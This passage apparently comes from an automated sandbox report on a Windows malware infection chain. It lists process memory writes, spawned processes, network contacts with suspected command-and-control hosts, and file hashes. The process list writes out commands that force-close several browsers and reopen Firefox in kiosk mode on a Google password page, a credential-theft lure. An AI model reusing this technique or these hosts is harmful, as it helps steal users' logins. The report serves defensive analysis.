N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3996 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3996 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3996 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 2388 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe
PID 2388 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe
PID 2388 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe
PID 2388 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe
PID 2388 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe
PID 2388 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe
PID 2388 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe
PID 2388 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe
PID 2388 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe
PID 768 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Windows\SysWOW64\taskkill.exe
PID 768 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 768 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 2492 wrote to memory of 4976 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4976 wrote to memory of 64 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe

"C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe

"C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe"

C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe

"C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe

"C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d92d31ce-f5a3-429d-bfee-34b7aaa576f1} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cdf2ac71-493d-4cfa-86bc-780cb4d6143b} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3308 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 3296 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e57c9d7-808a-417d-8029-441894a15200} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 2864 -prefMapHandle 3128 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a35bb935-a1e7-4338-ac37-e90e7ec41829} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4528 -prefMapHandle 4592 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8eca5152-64ce-4f5a-b805-bbefa256560d} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" utility

C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe

"C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5196 -childID 3 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b62478d6-d709-44bd-b79d-740a3637536d} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5332 -prefMapHandle 5336 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c60f979a-51f5-4126-9c86-67146ecac8b5} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5536 -prefMapHandle 5532 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 896 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3109225c-01e6-4b59-a516-fffeec11e072} 4976 "\\.\pipe\gecko-crash-server-pipe.4976" tab

C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe

"C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1564 -ip 1564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 1484

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 atten-supporse.biz udp
US 172.67.165.166:443 atten-supporse.biz tcp
US 8.8.8.8:53 166.165.67.172.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 104.21.81.153:443 se-blurry.biz tcp
US 8.8.8.8:53 153.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 104.21.62.142:443 zinc-sneark.biz tcp
US 8.8.8.8:53 142.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 172.67.153.96:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 96.153.67.172.in-addr.arpa udp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 formy-spill.biz udp
US 104.21.96.55:443 formy-spill.biz tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 55.96.21.104.in-addr.arpa udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 172.67.181.44:443 dare-curbys.biz tcp
N/A 127.0.0.1:57990 tcp
US 8.8.8.8:53 44.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.213.14:443 youtube.com tcp
GB 216.58.213.14:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
GB 216.58.213.14:443 youtube.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.238:443 www.youtube.com tcp
GB 142.250.187.238:443 www.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.200.14:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 104.21.35.246:443 print-vexer.biz tcp
GB 142.250.200.14:443 consent.youtube.com udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 83.106.226.44.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 246.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
N/A 127.0.0.1:57999 tcp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
NL 92.63.197.221:80 92.63.197.221 tcp
US 8.8.8.8:53 221.197.63.92.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4---sn-aigzrnsz.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrnsz.gvt1.com udp
GB 74.125.175.169:443 r4.sn-aigzrnsz.gvt1.com udp
US 8.8.8.8:53 169.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
GB 142.250.200.14:443 consent.youtube.com udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/3996-0-0x0000000000CF0000-0x00000000011CC000-memory.dmp

memory/3996-1-0x00000000779A4000-0x00000000779A6000-memory.dmp

memory/3996-2-0x0000000000CF1000-0x0000000000D1F000-memory.dmp

memory/3996-3-0x0000000000CF0000-0x00000000011CC000-memory.dmp

memory/3996-4-0x0000000000CF0000-0x00000000011CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 6d17158239deaa10445332a320d93bb4
SHA1 d7928e790267e50aa28a8f734329ea302f8176bb
SHA256 547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf
SHA512 c002e6913b1a5674d00e9077af4fada039b06f290114c47d3cd58b5ababc713bf9ba84defcf791e1dd51f93662e940baee376214b24c01fcdca0fd867bde55ff

memory/2388-16-0x00000000000C0000-0x000000000059C000-memory.dmp

